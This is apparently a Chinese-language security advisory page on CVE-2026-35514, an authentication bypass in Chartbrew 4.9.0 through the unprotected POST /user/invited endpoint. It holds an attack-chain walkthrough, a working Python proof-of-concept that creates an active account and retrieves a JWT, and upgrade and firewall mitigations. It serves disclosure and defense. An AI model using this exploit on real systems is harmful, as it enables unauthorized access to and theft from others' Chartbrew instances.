IPBUF安全漏洞报告
English
CVE-2026-35514 CVSS 6.5 中危

CVE-2026-35514 Chartbrew认证绕过漏洞

披露日期: 2026-04-30
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-35514
漏洞类型
认证绕过
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Chartbrew

相关标签

认证绕过ChartbrewCVE-2026-35514权限提升0-day

漏洞概述

Chartbrew 4.9.0版本存在一处严重的认证绕过漏洞。攻击者可利用`POST /user/invited`端点,在无需验证任何邀请令牌或身份认证的情况下,直接创建一个完全激活的账户并获取有效的JWT令牌。该漏洞完全绕过了系统的注册限制功能,即使在实例已存在用户且开启禁止公开注册的环境下仍可被利用,导致攻击者非法获取系统的高级访问权限。

技术细节

该漏洞的核心在于Chartbrew v4.9.0处理用户邀请逻辑时的严重安全缺失。具体来说,`/user/invited`端点本应用于处理受邀用户注册,但开发人员在实现该接口时,未添加对邀请令牌有效性的校验逻辑,同时也未检查用户的身份认证头部或Session会话状态。这与标准的`/user`注册端点形成鲜明对比,后者会严格遵守`signupRestricted`配置并要求邮箱验证。攻击者只需构造包含用户名、邮箱和密码的恶意POST请求发送至该端点,服务端便会无条件创建一个状态为“激活”的用户账户,并立即签发有效的JWT(JSON Web Token)。利用此令牌,攻击者即可完全绕过系统的访问控制机制,获得应用的完整操作权限,导致数据泄露或系统被篡改。

攻击链分析

STEP 1
1. 信息收集
攻击者识别出目标系统运行的是Chartbrew 4.9.0版本。
STEP 2
2. 发送恶意请求
攻击者向`POST /user/invited`端点发送包含恶意用户信息的HTTP请求,且不携带任何认证信息。
STEP 3
3. 绕过验证
由于服务端未校验邀请令牌和身份,直接接受请求并在数据库中创建激活状态的账户。
STEP 4
4. 获取权限
攻击者利用响应中返回的JWT令牌,以合法用户身份登录系统,窃取数据或进行破坏。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit_chartbrew(url): """ PoC for CVE-2026-35514: Chartbrew Authentication Bypass via /user/invited """ target_endpoint = f"{url.rstrip('/')}/user/invited" # Malicious payload to create a new active user payload = { "email": "[email protected]", "password": "Admin123!", "name": "Malicious User" } headers = { "Content-Type": "application/json" } try: print(f"[*] Sending request to {target_endpoint}...") response = requests.post(target_endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200 or response.status_code == 201: print("[+] Exploit successful! Account created.") print("[+] Response data:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") print(f"[-] Response: {response.text}") except Exception as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": target = "http://localhost:3000" # Replace with actual target exploit_chartbrew(target)

影响范围

Chartbrew < 5.0.0
Chartbrew 4.9.0

防御指南

临时缓解措施
建议立即将Chartbrew升级到5.0.0或更高版本以修复此漏洞。如果无法立即升级,应配置防火墙规则或WAF策略,阻断外部对`/user/invited`端点的访问请求,或临时关闭该服务直至完成更新。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表